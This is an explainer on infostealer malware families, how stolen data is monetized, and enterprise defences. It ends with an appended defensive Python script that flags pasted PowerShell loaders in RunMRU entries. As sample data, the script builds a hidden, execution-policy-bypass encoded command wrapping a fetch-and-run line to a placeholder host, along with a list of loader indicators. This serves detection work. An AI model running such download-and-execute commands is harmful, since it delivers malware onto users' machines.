The Rise of Infostealer Malware and Its Monetization in Enterprises
In the continually changing landscape of cyber threats, Infostealer malware has emerged as a formidable adversary for enterprises. These malicious programs are designed to covertly collect sensitive information from infected systems, posing significant risks to businesses of all sizes. Infostealers target a wide range of information, including financial data, login credentials, confidential documents and intellectual property. Understanding the rise of Infostealer malware and the ways it is monetized is crucial for maintaining robust defenses that protect enterprise environments.
The Proliferation of Infostealer Malware in Enterprises
Infostealer malware has gained traction within the enterprise sector for several reasons. The malware’s design enables efficient harvesting of valuable information with minimal user interaction. Cybercriminals employ sophisticated techniques such as phishing campaigns, malicious websites, and compromised software to distribute Infostealers, exploiting human vulnerabilities and technical weaknesses.
The rise of malware-as-a-service (MaaS) platforms has further facilitated the development and distribution of Infostealer malware. These platforms allow less technically skilled attackers to rent or purchase malware, lowering the barrier to entry for cybercrime. This democratization of cyber threats has led to an increase in the number and diversity of attacks targeting enterprises.
Real-World Examples of Infostealer Malware in Enterprises
- Emotet: Originally a banking Trojan, Emotet evolved into a highly modular malware family that includes Infostealer capabilities. Emotet has been used to steal login credentials and financial information from enterprises, often serving as a precursor to ransomware attacks. Emotet’s operators lease access to compromised networks to other cybercriminals, creating a lucrative business model. Some of the Emotet gang were arrested in Ukraine in January 2021 in a Europol-led operation; however, within six months their botnet was back online. Emotet is notorious for using Excel macros to deliver its initial malware loaders.
- TrickBot: TrickBot is another versatile malware family that started as a banking Trojan but has expanded its capabilities to include information stealing. It targets a wide range of data, from financial information to network credentials. TrickBot has been used in targeted attacks against enterprises, often leading to further exploitation by ransomware groups such as Ryuk.
- PlugX: PlugX is a sophisticated information-stealing malware, widely believed to originate from Chinese nation-state actors. It is primarily used to infiltrate government agencies and related organizations with the intent of exfiltrating sensitive data for strategic advantage. Around January 2022, a new variant of PlugX emerged that propagates as a USB worm and has caused tens of millions of infections across the globe. Embassies, medical and vaccine research organizations, and defense contractors are just some of the organizations that have fallen victim to PlugX.
- Lumma: Lumma is an information stealer designed to collect sensitive data from infected systems. It typically targets credentials, browser cookies, saved passwords, and other personal information from web browsers and applications. Lumma spreads through malicious attachments, phishing emails, or compromised websites, stealthily gathering stolen data and transmitting it to command-and-control servers operated by cybercriminals. Lumma is particularly prevalent right now, with a new delivery method that socially engineers users into pasting PowerShell commands into the Windows ‘Run’ dialog.
Monetization and Utilization of Stolen Information
Once Infostealers successfully exfiltrate data from enterprise systems, cybercriminals have several avenues to monetize and utilize the stolen information:
- Sale on Dark Web Marketplaces: Stolen credentials and enterprise information are often sold on dark web marketplaces. These markets operate with relative anonymity, allowing cybercriminals to profit from the sale of large volumes of compromised data. Corporate email accounts, VPN credentials, and financial data can command high prices.
- Account Takeovers and Fraud: Cybercriminals use stolen credentials to gain unauthorized access to enterprise systems. These accounts can then be used to commit fraud, such as making unauthorized purchases, transferring funds, or launching further cyberattacks. The financial impact on enterprises can be substantial, and the recovery process is often lengthy and challenging.
- Ransom and Extortion: Cybercriminals may also use stolen data to extort enterprises. By threatening to publicly release sensitive information, attackers can coerce businesses into paying a ransom. The fear of reputational damage or regulatory penalties often compels enterprises to comply with the attackers’ demands.
- Strategic Advantages: In the case of nation-states, stolen intellectual property and blueprints can be immensely valuable, providing governments with significant strategic advantages, particularly in their defense capabilities. By acquiring confidential information related to advanced technologies, weapons systems, and military infrastructure, nation-states can accelerate their own defense development, bypass research and development costs, and potentially neutralize the military advantages of rival countries.
Defending Against Infostealers in Enterprises
To protect against the threat of Infostealer malware, enterprises must adopt a multi-layered approach to cybersecurity:
- Regularly updating and patching software to close vulnerabilities that could be exploited by malware.
- Implementing robust email filtering and web security solutions to block phishing attempts and malicious websites.
- Using strong, unique passwords for all accounts and enabling multi-factor authentication (MFA) to add an extra layer of security.
- Conducting regular security awareness training for employees to recognize and respond to phishing attempts and other social engineering tactics.
- Hardening removable-media (USB) policies to reduce the risk of users inserting infected drives that carry information-stealing worms.
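The Lumma delivery method described above, where a user is talked into pasting a PowerShell command into the Windows ‘Run’ dialog, leaves a trace: Explorer records what was typed under the RunMRU registry key. As an added example that is not part of the original article, the following Python scans entries shaped like that key, flags launcher commands carrying typical copy-and-paste loader indicators, and decodes any -EncodedCommand payload so an analyst can read it; the sample entries and the example.invalid host are constructed.

```python
import base64
import re

# Constructed sample standing in for an export of
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# (each value is the typed command followed by "\1"; MRUList orders the slots).
PAYLOAD = "iex (irm http://example.invalid/p)"          # inert, constructed
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mstsc /v:fileserver01\\1",
    "c": f"powershell -w hidden -ep bypass -enc {ENCODED}\\1",
}
# Case-insensitive substrings typical of copy-and-paste loaders.
INDICATORS = (
    "iex", "invoke-expression", "irm", "invoke-restmethod", "iwr",
    "invoke-webrequest", "downloadstring", "frombase64string", "-w hidden",
    "windowstyle hidden", "-ep bypass", "executionpolicy bypass", "mshta",
)
LAUNCHERS = re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)(\.exe)?\b", re.I)


def decode_encoded_command(command: str):
    """Return the UTF-16LE payload behind -EncodedCommand, or None if absent/invalid."""
    tokens = command.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-/")   # -e, -ec, -en, -enc ... all select -EncodedCommand
        if tok[:1] in "-/" and flag and (flag == "ec" or "encodedcommand".startswith(flag)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except ValueError:            # binascii.Error and UnicodeDecodeError are ValueErrors
                return None
    return None


def analyze_runmru(runmru: dict) -> list:
    """Return suspicious Run-box entries, most recent first, with matched indicators."""
    findings = []
    for slot in runmru.get("MRUList", ""):
        raw = runmru.get(slot, "")
        command = raw[:-2] if raw.endswith("\\1") else raw
        if not LAUNCHERS.search(command):
            continue                      # plain programs such as notepad are not of interest
        decoded = decode_encoded_command(command)
        haystack = (command + " " + (decoded or "")).lower()
        hits = [ind for ind in INDICATORS if ind in haystack]
        if decoded is not None:
            hits.append("encodedcommand")   # an encoded command typed into Run is itself a strong signal
        if hits:
            findings.append({"slot": slot, "command": command, "decoded": decoded, "indicators": hits})
    return findings
```

On a real host the same functions can be fed a parsed `reg export` of the RunMRU key for each user profile; a hit is a prompt to pull the user's PowerShell operational logs and reset the affected credentials.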
By understanding the rise and monetization of Infostealer malware, enterprises can better prepare to defend against this insidious threat. Proactive measures, combined with vigilance and continuous improvement of security practices, are essential in safeguarding enterprise environments from the pervasive threat of Infostealers.